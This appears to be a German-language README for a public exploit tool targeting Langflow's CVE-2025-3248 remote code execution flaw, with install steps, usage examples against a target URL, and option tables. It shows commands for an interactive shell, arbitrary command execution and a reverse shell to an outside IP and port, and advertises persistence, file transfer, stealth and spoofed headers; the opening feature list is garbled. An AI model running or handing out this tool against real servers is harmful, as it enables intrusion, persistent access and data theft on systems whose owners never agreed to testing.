
Exploit für Remote-Code-Ausführung für Langflow (CVE-2025-3248) - [ Von S4Tech ]
Exploit zur Remote-Code-Ausführung für Langflow (CVE-2025-3248)
persist-Befehl)upload local_path remote_pathdownload remote_path local_pathclear-Befehl für das TerminalUser-AgentX-Forwarded-For-IPsexploit_log.txt.langflow_shell_history)requestscoloramareadlinegit clone https://github.com/0-d3y/langflow-rce-exploit.git
cd langflow-rce-exploit
pip install -r requirements.txt
python exploit.py <URL> [Optionen]
python exploit.py http://target.com
python exploit.py http://target.com --shell
python exploit.py http://target.com --command "whoami"
python exploit.py http://target.com --reverse 192.168.1.100 4444
Image.png)
âڑ ï¸ڈ Dieses Tool ist ausschließlich für Bildungs- und autorisierte Testzwecke bestimmt.
âڑ ï¸ڈ Nicht autorisierte Nutzung gegen Systeme, die Sie nicht besitzen oder für die Sie keine Testberechtigung haben, ist illegal.
Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe Datei LICENSE für Details.
Pull-Requests sind willkommen. Bei größeren Änderungen eröffnen Sie bitte zuerst ein Issue, um zu besprechen, was Sie ändern möchten.
| Feature | v1.0 | v2.0 |
|---|
| Payload-Methoden | 1 | 5 |
| Dateiübertragung | ❌ Nicht unterstützt | ✅ Unterstützt |
| Persistenz | ❌ | ✅ |
| Tarnungsstufe | Basis | Erweitert |
| Sitzungsprotokollierung | ❌ | ✅ |
| Option | Beschreibung |
|---|
--shell | Interaktive Shell starten |
--reverse IP PORT | Reverse-Shell zur angegebenen IP:PORT starten |
--command CMD | Einzelnen Befehl ausführen |
--verbose | Ausführliche Ausgabe aktivieren |
--timeout SEC | Anforderungs-Timeout festlegen (Standard: 10s) |